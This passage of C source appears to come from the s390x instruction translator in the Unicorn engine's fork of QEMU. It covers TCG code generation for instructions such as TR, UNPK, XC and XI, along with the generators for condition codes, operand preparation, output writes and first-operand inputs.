TCGv_i32 l1 = tcg_const_i32(tcg_ctx, get_field(s, l1) + 1); gen_helper_tp(tcg_ctx, tcg_ctx->cc_op, tcg_ctx->cpu_env, o->addr1, l1); tcg_temp_free_i32(tcg_ctx, l1); set_cc_static(s); return DISAS_NEXT; } static DisasJumpType op_tr(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i32 l = tcg_const_i32(tcg_ctx, get_field(s, l1)); gen_helper_tr(tcg_ctx, tcg_ctx->cpu_env, l, o->addr1, o->in2); tcg_temp_free_i32(tcg_ctx, l); set_cc_static(s); return DISAS_NEXT; } static DisasJumpType op_tre(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; gen_helper_tre(tcg_ctx, o->out, tcg_ctx->cpu_env, o->out, o->out2, o->in2); return_low128(tcg_ctx, o->out2); set_cc_static(s); return DISAS_NEXT; } static DisasJumpType op_trt(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i32 l = tcg_const_i32(tcg_ctx, get_field(s, l1)); gen_helper_trt(tcg_ctx, tcg_ctx->cc_op, tcg_ctx->cpu_env, l, o->addr1, o->in2); tcg_temp_free_i32(tcg_ctx, l); set_cc_static(s); return DISAS_NEXT; } static DisasJumpType op_trtr(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; 
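/* TRTR: as TRT, but the helper scans the operand right to left. */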
TCGv_i32 l = tcg_const_i32(tcg_ctx, get_field(s, l1)); gen_helper_trtr(tcg_ctx, tcg_ctx->cc_op, tcg_ctx->cpu_env, l, o->addr1, o->in2); tcg_temp_free_i32(tcg_ctx, l); set_cc_static(s); return DISAS_NEXT; } static DisasJumpType op_trXX(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i32 r1 = tcg_const_i32(tcg_ctx, get_field(s, r1)); TCGv_i32 r2 = tcg_const_i32(tcg_ctx, get_field(s, r2)); TCGv_i32 sizes = tcg_const_i32(tcg_ctx, s->insn->opc & 3); TCGv_i32 tst = tcg_temp_new_i32(tcg_ctx); int m3 = get_field(s, m3); if (!s390_has_feat(s->uc, S390_FEAT_ETF2_ENH)) { m3 = 0; } if (m3 & 1) { tcg_gen_movi_i32(tcg_ctx, tst, -1); } else { tcg_gen_extrl_i64_i32(tcg_ctx, tst, tcg_ctx->regs[0]); if (s->insn->opc & 3) { tcg_gen_ext8u_i32(tcg_ctx, tst, tst); } else { tcg_gen_ext16u_i32(tcg_ctx, tst, tst); } } gen_helper_trXX(tcg_ctx, tcg_ctx->cc_op, tcg_ctx->cpu_env, r1, r2, tst, sizes); tcg_temp_free_i32(tcg_ctx, r1); tcg_temp_free_i32(tcg_ctx, r2); tcg_temp_free_i32(tcg_ctx, sizes); tcg_temp_free_i32(tcg_ctx, tst); set_cc_static(s); return DISAS_NEXT; } static DisasJumpType op_ts(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i32 t1 = tcg_const_i32(tcg_ctx, 0xff); tcg_gen_atomic_xchg_i32(tcg_ctx, t1, o->in2, t1, get_mem_index(s), MO_UB); tcg_gen_extract_i32(tcg_ctx, tcg_ctx->cc_op, t1, 7, 1); tcg_temp_free_i32(tcg_ctx, t1); set_cc_static(s); return DISAS_NEXT; } static DisasJumpType op_unpk(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i32 l = tcg_const_i32(tcg_ctx, get_field(s, l1)); gen_helper_unpk(tcg_ctx, tcg_ctx->cpu_env, l, o->addr1, o->in2); tcg_temp_free_i32(tcg_ctx, l); return DISAS_NEXT; } static DisasJumpType op_unpka(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; int l1 = get_field(s, l1) + 1; TCGv_i32 l; /* The length must not exceed 32 bytes. */ if (l1 > 32) { gen_program_exception(s, PGM_SPECIFICATION); return DISAS_NORETURN; } l = tcg_const_i32(tcg_ctx, l1); gen_helper_unpka(tcg_ctx, tcg_ctx->cc_op, tcg_ctx->cpu_env, o->addr1, l, o->in2); tcg_temp_free_i32(tcg_ctx, l); set_cc_static(s); return DISAS_NEXT; } static DisasJumpType op_unpku(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; int l1 = get_field(s, l1) + 1; TCGv_i32 l; /* The length must be even and should not exceed 64 bytes. */ if ((l1 & 1) || (l1 > 64)) { gen_program_exception(s, PGM_SPECIFICATION); return DISAS_NORETURN; } l = tcg_const_i32(tcg_ctx, l1); gen_helper_unpku(tcg_ctx, tcg_ctx->cc_op, tcg_ctx->cpu_env, o->addr1, l, o->in2); tcg_temp_free_i32(tcg_ctx, l); set_cc_static(s); return DISAS_NEXT; } static DisasJumpType op_xc(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; int d1 = get_field(s, d1); int d2 = get_field(s, d2); int b1 = get_field(s, b1); int b2 = get_field(s, b2); int l = get_field(s, l1); TCGv_i32 t32; o->addr1 = get_address(s, 0, b1, d1); /* If the addresses are identical, this is a store/memset of zero. 
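Every byte XORed with itself is zero, so short lengths are expanded inline below using the widest stores that fit.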
*/ if (b1 == b2 && d1 == d2 && (l + 1) <= 32) { o->in2 = tcg_const_i64(tcg_ctx, 0); l++; while (l >= 8) { tcg_gen_qemu_st64(tcg_ctx, o->in2, o->addr1, get_mem_index(s)); l -= 8; if (l > 0) { tcg_gen_addi_i64(tcg_ctx, o->addr1, o->addr1, 8); } } if (l >= 4) { tcg_gen_qemu_st32(tcg_ctx, o->in2, o->addr1, get_mem_index(s)); l -= 4; if (l > 0) { tcg_gen_addi_i64(tcg_ctx, o->addr1, o->addr1, 4); } } if (l >= 2) { tcg_gen_qemu_st16(tcg_ctx, o->in2, o->addr1, get_mem_index(s)); l -= 2; if (l > 0) { tcg_gen_addi_i64(tcg_ctx, o->addr1, o->addr1, 2); } } if (l) { tcg_gen_qemu_st8(tcg_ctx, o->in2, o->addr1, get_mem_index(s)); } gen_op_movi_cc(s, 0); return DISAS_NEXT; } /* But in general we'll defer to a helper. */ o->in2 = get_address(s, 0, b2, d2); t32 = tcg_const_i32(tcg_ctx, l); gen_helper_xc(tcg_ctx, tcg_ctx->cc_op, tcg_ctx->cpu_env, t32, o->addr1, o->in2); tcg_temp_free_i32(tcg_ctx, t32); set_cc_static(s); return DISAS_NEXT; } static DisasJumpType op_xor(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; tcg_gen_xor_i64(tcg_ctx, o->out, o->in1, o->in2); return DISAS_NEXT; } static DisasJumpType op_xori(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; int shift = s->insn->data & 0xff; int size = s->insn->data >> 8; uint64_t mask = ((1ull << size) - 1) << shift; assert(!o->g_in2); tcg_gen_shli_i64(tcg_ctx, o->in2, o->in2, shift); tcg_gen_xor_i64(tcg_ctx, o->out, o->in1, o->in2); /* Produce the CC from only the bits manipulated. */ tcg_gen_andi_i64(tcg_ctx, tcg_ctx->cc_dst, o->out, mask); set_cc_nz_u64(s, tcg_ctx->cc_dst); return DISAS_NEXT; } static DisasJumpType op_xi(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; o->in1 = tcg_temp_new_i64(tcg_ctx); if (!s390_has_feat(s->uc, S390_FEAT_INTERLOCKED_ACCESS_2)) { tcg_gen_qemu_ld_tl(tcg_ctx, o->in1, o->addr1, get_mem_index(s), s->insn->data); } else { /* Perform the atomic operation in memory. */ tcg_gen_atomic_fetch_xor_i64(tcg_ctx, o->in1, o->addr1, o->in2, get_mem_index(s), s->insn->data); } /* Recompute also for atomic case: needed for setting CC. 
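The atomic fetch-xor left the original memory value in in1, so XORing with in2 reproduces the value that was stored.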
*/ tcg_gen_xor_i64(tcg_ctx, o->out, o->in1, o->in2); if (!s390_has_feat(s->uc, S390_FEAT_INTERLOCKED_ACCESS_2)) { tcg_gen_qemu_st_tl(tcg_ctx, o->out, o->addr1, get_mem_index(s), s->insn->data); } return DISAS_NEXT; } static DisasJumpType op_zero(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; o->out = tcg_const_i64(tcg_ctx, 0); return DISAS_NEXT; } static DisasJumpType op_zero2(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; o->out = tcg_const_i64(tcg_ctx, 0); o->out2 = o->out; o->g_out2 = true; return DISAS_NEXT; } static DisasJumpType op_clp(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i32 r2 = tcg_const_i32(tcg_ctx, get_field(s, r2)); gen_helper_clp(tcg_ctx, tcg_ctx->cpu_env, r2); tcg_temp_free_i32(tcg_ctx, r2); set_cc_static(s); return DISAS_NEXT; } static DisasJumpType op_pcilg(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i32 r1 = tcg_const_i32(tcg_ctx, get_field(s, r1)); TCGv_i32 r2 = tcg_const_i32(tcg_ctx, get_field(s, r2)); gen_helper_pcilg(tcg_ctx, tcg_ctx->cpu_env, r1, r2); tcg_temp_free_i32(tcg_ctx, r1); tcg_temp_free_i32(tcg_ctx, r2); set_cc_static(s); return DISAS_NEXT; } static DisasJumpType op_pcistg(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i32 r1 = tcg_const_i32(tcg_ctx, get_field(s, r1)); TCGv_i32 r2 = tcg_const_i32(tcg_ctx, get_field(s, r2)); gen_helper_pcistg(tcg_ctx, tcg_ctx->cpu_env, r1, r2); tcg_temp_free_i32(tcg_ctx, r1); tcg_temp_free_i32(tcg_ctx, r2); set_cc_static(s); return DISAS_NEXT; } static DisasJumpType op_stpcifc(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i32 r1 = tcg_const_i32(tcg_ctx, get_field(s, r1)); TCGv_i32 ar = tcg_const_i32(tcg_ctx, get_field(s, b2)); gen_helper_stpcifc(tcg_ctx, tcg_ctx->cpu_env, r1, o->addr1, ar); tcg_temp_free_i32(tcg_ctx, ar); tcg_temp_free_i32(tcg_ctx, r1); set_cc_static(s); return DISAS_NEXT; } static DisasJumpType op_sic(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; gen_helper_sic(tcg_ctx, tcg_ctx->cpu_env, o->in1, o->in2); return DISAS_NEXT; } static DisasJumpType op_rpcit(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i32 r1 = tcg_const_i32(tcg_ctx, get_field(s, r1)); TCGv_i32 r2 = tcg_const_i32(tcg_ctx, get_field(s, r2)); gen_helper_rpcit(tcg_ctx, tcg_ctx->cpu_env, r1, r2); tcg_temp_free_i32(tcg_ctx, r1); tcg_temp_free_i32(tcg_ctx, r2); set_cc_static(s); return DISAS_NEXT; } static DisasJumpType op_pcistb(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i32 r1 = tcg_const_i32(tcg_ctx, get_field(s, r1)); TCGv_i32 r3 = tcg_const_i32(tcg_ctx, get_field(s, r3)); TCGv_i32 ar = tcg_const_i32(tcg_ctx, get_field(s, b2)); gen_helper_pcistb(tcg_ctx, tcg_ctx->cpu_env, r1, r3, o->addr1, ar); tcg_temp_free_i32(tcg_ctx, ar); tcg_temp_free_i32(tcg_ctx, r1); tcg_temp_free_i32(tcg_ctx, r3); set_cc_static(s); return DISAS_NEXT; } static DisasJumpType op_mpcifc(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i32 r1 = tcg_const_i32(tcg_ctx, get_field(s, r1)); TCGv_i32 ar = tcg_const_i32(tcg_ctx, get_field(s, b2)); gen_helper_mpcifc(tcg_ctx, tcg_ctx->cpu_env, r1, o->addr1, ar); tcg_temp_free_i32(tcg_ctx, ar); tcg_temp_free_i32(tcg_ctx, r1); set_cc_static(s); return DISAS_NEXT; } #include "translate_vx.inc.c" /* ====================================================================== */ /* The "Cc OUTput" generators. 
Given the generated output (and in some cases the original inputs), update the various cc data structures in order to be able to compute the new condition code. */ static void cout_abs32(DisasContext *s, DisasOps *o) { gen_op_update1_cc_i64(s, CC_OP_ABS_32, o->out); } static void cout_abs64(DisasContext *s, DisasOps *o) { gen_op_update1_cc_i64(s, CC_OP_ABS_64, o->out); } static void cout_adds32(DisasContext *s, DisasOps *o) { gen_op_update3_cc_i64(s, CC_OP_ADD_32, o->in1, o->in2, o->out); } static void cout_adds64(DisasContext *s, DisasOps *o) { gen_op_update3_cc_i64(s, CC_OP_ADD_64, o->in1, o->in2, o->out); } static void cout_addu32(DisasContext *s, DisasOps *o) { gen_op_update3_cc_i64(s, CC_OP_ADDU_32, o->in1, o->in2, o->out); } static void cout_addu64(DisasContext *s, DisasOps *o) { gen_op_update3_cc_i64(s, CC_OP_ADDU_64, o->in1, o->in2, o->out); } static void cout_addc32(DisasContext *s, DisasOps *o) { gen_op_update3_cc_i64(s, CC_OP_ADDC_32, o->in1, o->in2, o->out); } static void cout_addc64(DisasContext *s, DisasOps *o) { gen_op_update3_cc_i64(s, CC_OP_ADDC_64, o->in1, o->in2, o->out); } static void cout_cmps32(DisasContext *s, DisasOps *o) { gen_op_update2_cc_i64(s, CC_OP_LTGT_32, o->in1, o->in2); } static void cout_cmps64(DisasContext *s, DisasOps *o) { gen_op_update2_cc_i64(s, CC_OP_LTGT_64, o->in1, o->in2); } static void cout_cmpu32(DisasContext *s, DisasOps *o) { gen_op_update2_cc_i64(s, CC_OP_LTUGTU_32, o->in1, o->in2); } static void cout_cmpu64(DisasContext *s, DisasOps *o) { gen_op_update2_cc_i64(s, CC_OP_LTUGTU_64, o->in1, o->in2); } static void cout_f32(DisasContext *s, DisasOps *o) { gen_op_update1_cc_i64(s, CC_OP_NZ_F32, o->out); } static void cout_f64(DisasContext *s, DisasOps *o) { gen_op_update1_cc_i64(s, CC_OP_NZ_F64, o->out); } static void cout_f128(DisasContext *s, DisasOps *o) { gen_op_update2_cc_i64(s, CC_OP_NZ_F128, o->out, o->out2); } static void cout_nabs32(DisasContext *s, DisasOps *o) { gen_op_update1_cc_i64(s, CC_OP_NABS_32, o->out); } static void cout_nabs64(DisasContext *s, DisasOps *o) { gen_op_update1_cc_i64(s, CC_OP_NABS_64, o->out); } static void cout_neg32(DisasContext *s, DisasOps *o) { gen_op_update1_cc_i64(s, CC_OP_COMP_32, o->out); } static void cout_neg64(DisasContext *s, DisasOps *o) { gen_op_update1_cc_i64(s, CC_OP_COMP_64, o->out); } static void cout_nz32(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; tcg_gen_ext32u_i64(tcg_ctx, tcg_ctx->cc_dst, o->out); gen_op_update1_cc_i64(s, CC_OP_NZ, tcg_ctx->cc_dst); } static void cout_nz64(DisasContext *s, DisasOps *o) { gen_op_update1_cc_i64(s, CC_OP_NZ, o->out); } static void cout_s32(DisasContext *s, DisasOps *o) { gen_op_update1_cc_i64(s, CC_OP_LTGT0_32, o->out); } static void cout_s64(DisasContext *s, DisasOps *o) { gen_op_update1_cc_i64(s, CC_OP_LTGT0_64, o->out); } static void cout_subs32(DisasContext *s, DisasOps *o) { gen_op_update3_cc_i64(s, CC_OP_SUB_32, o->in1, o->in2, o->out); } static void cout_subs64(DisasContext *s, DisasOps *o) { gen_op_update3_cc_i64(s, CC_OP_SUB_64, o->in1, o->in2, o->out); } static void cout_subu32(DisasContext *s, DisasOps *o) { gen_op_update3_cc_i64(s, CC_OP_SUBU_32, o->in1, o->in2, o->out); } static void cout_subu64(DisasContext *s, DisasOps *o) { gen_op_update3_cc_i64(s, CC_OP_SUBU_64, o->in1, o->in2, o->out); } static void cout_subb32(DisasContext *s, DisasOps *o) { gen_op_update3_cc_i64(s, CC_OP_SUBB_32, o->in1, o->in2, o->out); } static void cout_subb64(DisasContext *s, DisasOps *o) { gen_op_update3_cc_i64(s, CC_OP_SUBB_64, o->in1, 
o->in2, o->out); } static void cout_tm32(DisasContext *s, DisasOps *o) { gen_op_update2_cc_i64(s, CC_OP_TM_32, o->in1, o->in2); } static void cout_tm64(DisasContext *s, DisasOps *o) { gen_op_update2_cc_i64(s, CC_OP_TM_64, o->in1, o->in2); } /* ====================================================================== */ /* The "PREParation" generators. These initialize the DisasOps.OUT fields with the TCG register to which we will write. Used in combination with the "wout" generators, in some cases we need a new temporary, and in some cases we can write to a TCG global. */ static void prep_new(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; o->out = tcg_temp_new_i64(tcg_ctx); } #define SPEC_prep_new 0 static void prep_new_P(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; o->out = tcg_temp_new_i64(tcg_ctx); o->out2 = tcg_temp_new_i64(tcg_ctx); } #define SPEC_prep_new_P 0 static void prep_r1(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; o->out = tcg_ctx->regs[get_field(s, r1)]; o->g_out = true; } #define SPEC_prep_r1 0 static void prep_r1_P(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; int r1 = get_field(s, r1); o->out = tcg_ctx->regs[r1]; o->out2 = tcg_ctx->regs[r1 + 1]; o->g_out = o->g_out2 = true; } #define SPEC_prep_r1_P SPEC_r1_even /* Whenever we need x1 in addition to other inputs, we'll load it to out/out2 */ static void prep_x1(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; o->out = load_freg(tcg_ctx, get_field(s, r1)); o->out2 = load_freg(tcg_ctx, get_field(s, r1) + 2); } #define SPEC_prep_x1 SPEC_r1_f128 /* ====================================================================== */ /* The "Write OUTput" generators. These generally perform some non-trivial copy of data to TCG globals, or to main memory. The trivial cases are generally handled by having a "prep" generator install the TCG global as the destination of the operation. 
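Each wout_* below is paired with a SPEC_wout_* constant recording any even-register-pair or 128-bit FP register constraints on the destination.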
*/ static void wout_r1(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; store_reg(tcg_ctx, get_field(s, r1), o->out); } #define SPEC_wout_r1 0 static void wout_r1_8(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; int r1 = get_field(s, r1); tcg_gen_deposit_i64(tcg_ctx, tcg_ctx->regs[r1], tcg_ctx->regs[r1], o->out, 0, 8); } #define SPEC_wout_r1_8 0 static void wout_r1_16(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; int r1 = get_field(s, r1); tcg_gen_deposit_i64(tcg_ctx, tcg_ctx->regs[r1], tcg_ctx->regs[r1], o->out, 0, 16); } #define SPEC_wout_r1_16 0 static void wout_r1_32(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; store_reg32_i64(tcg_ctx, get_field(s, r1), o->out); } #define SPEC_wout_r1_32 0 static void wout_r1_32h(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; store_reg32h_i64(tcg_ctx, get_field(s, r1), o->out); } #define SPEC_wout_r1_32h 0 static void wout_r1_P32(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; int r1 = get_field(s, r1); store_reg32_i64(tcg_ctx, r1, o->out); store_reg32_i64(tcg_ctx, r1 + 1, o->out2); } #define SPEC_wout_r1_P32 SPEC_r1_even static void wout_r1_D32(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; int r1 = get_field(s, r1); TCGv_i64 t = tcg_temp_new_i64(tcg_ctx); store_reg32_i64(tcg_ctx, r1 + 1, o->out); tcg_gen_shri_i64(tcg_ctx, t, o->out, 32); store_reg32_i64(tcg_ctx, r1, t); tcg_temp_free_i64(tcg_ctx, t); } #define SPEC_wout_r1_D32 SPEC_r1_even static void wout_r3_P32(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; int r3 = get_field(s, r3); store_reg32_i64(tcg_ctx, r3, o->out); store_reg32_i64(tcg_ctx, r3 + 1, o->out2); } #define SPEC_wout_r3_P32 SPEC_r3_even static void wout_r3_P64(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; int r3 = get_field(s, r3); store_reg(tcg_ctx, r3, o->out); store_reg(tcg_ctx, r3 + 1, o->out2); } #define SPEC_wout_r3_P64 SPEC_r3_even static void wout_e1(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; store_freg32_i64(tcg_ctx, get_field(s, r1), o->out); } #define SPEC_wout_e1 0 static void wout_f1(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; store_freg(tcg_ctx, get_field(s, r1), o->out); } #define SPEC_wout_f1 0 static void wout_x1(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; int f1 = get_field(s, r1); store_freg(tcg_ctx, f1, o->out); store_freg(tcg_ctx, f1 + 2, o->out2); } #define SPEC_wout_x1 SPEC_r1_f128 static void wout_cond_r1r2_32(DisasContext *s, DisasOps *o) { if (get_field(s, r1) != get_field(s, r2)) { TCGContext *tcg_ctx = s->uc->tcg_ctx; store_reg32_i64(tcg_ctx, get_field(s, r1), o->out); } } #define SPEC_wout_cond_r1r2_32 0 static void wout_cond_e1e2(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; if (get_field(s, r1) != get_field(s, r2)) { store_freg32_i64(tcg_ctx, get_field(s, r1), o->out); } } #define SPEC_wout_cond_e1e2 0 static void wout_m1_8(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; tcg_gen_qemu_st8(tcg_ctx, o->out, o->addr1, get_mem_index(s)); } #define SPEC_wout_m1_8 0 static void wout_m1_16(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; tcg_gen_qemu_st16(tcg_ctx, o->out, o->addr1, get_mem_index(s)); } #define SPEC_wout_m1_16 0 static void wout_m1_16a(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; tcg_gen_qemu_st_tl(tcg_ctx, o->out, 
o->addr1, get_mem_index(s), MO_TEUW | MO_ALIGN); } #define SPEC_wout_m1_16a 0 static void wout_m1_32(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; tcg_gen_qemu_st32(tcg_ctx, o->out, o->addr1, get_mem_index(s)); } #define SPEC_wout_m1_32 0 static void wout_m1_32a(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; tcg_gen_qemu_st_tl(tcg_ctx, o->out, o->addr1, get_mem_index(s), MO_TEUL | MO_ALIGN); } #define SPEC_wout_m1_32a 0 static void wout_m1_64(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; tcg_gen_qemu_st64(tcg_ctx, o->out, o->addr1, get_mem_index(s)); } #define SPEC_wout_m1_64 0 static void wout_m1_64a(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; tcg_gen_qemu_st_i64(tcg_ctx, o->out, o->addr1, get_mem_index(s), MO_TEQ | MO_ALIGN); } #define SPEC_wout_m1_64a 0 static void wout_m2_32(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; tcg_gen_qemu_st32(tcg_ctx, o->out, o->in2, get_mem_index(s)); } #define SPEC_wout_m2_32 0 static void wout_in2_r1(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; store_reg(tcg_ctx, get_field(s, r1), o->in2); } #define SPEC_wout_in2_r1 0 static void wout_in2_r1_32(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; store_reg32_i64(tcg_ctx, get_field(s, r1), o->in2); } #define SPEC_wout_in2_r1_32 0 /* ====================================================================== */ /* The "INput 1" generators. These load the first operand to an insn. */ static void in1_r1(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; o->in1 = load_reg(tcg_ctx, get_field(s, r1)); } #define SPEC_in1_r1 0 static void in1_r1_o(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; o->in1 = tcg_ctx->regs[get_field(s, r1)]; o->g_in1 = true; } #define SPEC_in1_r1_o 0 static void in1_r1_32s(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; o->in1 = tcg_temp_new_i64(tcg_ctx); tcg_gen_ext32s_i64(tcg_ctx, o->in1, tcg_ctx->regs[get_field(s, r1)]); } #define SPEC_in1_r1_32s 0 static void in1_r1_32u(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; o->in1 = tcg_temp_new_i64(tcg_ctx); tcg_gen_ext32u_i64(tcg_ctx, o->in1, tcg_ctx->regs[get_field(s, r1)]); } #define SPEC_in1_r1_32u 0 static void in1_r1_sr32(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; o->in1 = tcg_temp_new_i64(tcg_ctx); tcg_gen_shri_i64(tcg_ctx, o->in1, tcg_ctx->regs[get_field(s, r1)], 32); } #define SPEC_in1_r1_sr32 0 static void in1_r1p1(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; o->in1 = load_reg(tcg_ctx, get_field(s, r1) + 1); } #define SPEC_in1_r1p1 SPEC_r1_even static void in1_r1p1_32s(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; o->in1 = tcg_temp_new_i64(tcg_ctx); tcg_gen_ext32s_i64(tcg_ctx, o->in1, tcg_ctx->regs[get_field(s, r1) + 1]); } #define SPEC_in1_r1p1_32s SPEC_r1_even static void in1_r1p1_32u(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; o->in1 = tcg_temp_new_i64(tcg_ctx); tcg_gen_ext32u_i64(tcg_ctx, o->in1, tcg_ctx->regs[get_field(s, r1) + 1]); } #define SPEC_in1_r1p1_32u SPEC_r1_even static void in1_r1_D32(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; int r1 = get_field(s, r1); o->in1 = tcg_temp_new_i64(tcg_ctx); tcg_gen_concat32_i64(tcg_ctx, o->in1, tcg_ctx->regs[r1 + 1], tcg_ctx->regs[r1]); } #define SPEC_in1_r1_D32 SPEC_r1_even static void in1_r2(DisasContext *s, 
DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; o->in1 = load_reg(tcg_ctx, get_field(s, r2)); } #define SPEC_in1_r2 0 static void in1_r2_sr32(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; o->in1 = tcg_temp_new_i64(tcg_ctx); tcg_gen_shri_i64(tcg_ctx, o->in1, tcg_ctx->regs[get_field(s, r2)], 32); } #define SPEC_in1_r2_sr32 0 static void in1_r3(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; o->in1 = load_reg(tcg_ctx, get_field(s, r3)); } #define SPEC_in1_r3 0 static void in1_r3_o(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; o->in1 = tcg_ctx->regs[get_field(s, r3)]; o->g_in1 = true; } #define SPEC_in1_r3_o 0 static void in1_r3_32s(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; o->in1 = tcg_temp_new_i64(tcg_ctx); tcg_gen_ext32s_i64(tcg_ctx, o->in1, tcg_ctx->regs[get_field(s, r3)]); } #define SPEC_in1_r3_32s 0 static void in1_r3_32u(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; o->in1 = tcg_temp_new_i64(tcg_ctx); tcg_gen_ext32u_i64(tcg_ctx, o->in1, tcg_ctx->regs[get_field(s, r3)]); } #define SPEC_in1_r3_32u 0 static void in1_r3_D32(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; int r3 = get_field(s, r3); o->in1 = tcg_temp_new_i64(tcg_ctx); tcg_gen_concat32_i64(tcg_ctx, o->in1, tcg_ctx->regs[r3 + 1], tcg_ctx->regs[r3]); } #define SPEC_in1_r3_D32 SPEC_r3_even static void in1_e1(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; o->in1 = load_freg32_i64(tcg_ctx, get_field(s, r1)); } #define SPEC_in1_e1 0 static void in1_f1(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; o->in1 = load_freg(tcg_ctx, get_field(s, r1)); } #define SPEC_in1_f1 0 /* Load the high double word of an extended (128-bit) format FP number */ static void in1_x2h(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; o->in1 = load_freg(tcg_ctx, get_field(s, r2)); } #define SPEC_in1_x2h SPEC_r2_f128 static void in1_f3(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; o->in1 = load_freg(tcg_ctx, get_field(s, r3)); } #define SPEC_in1_f3 0 static void in1_la1(DisasContext *s, DisasOps *o) { o->addr1 = get_address(s, 0, get_field(s, b1), get_field(s, d1)); } #define 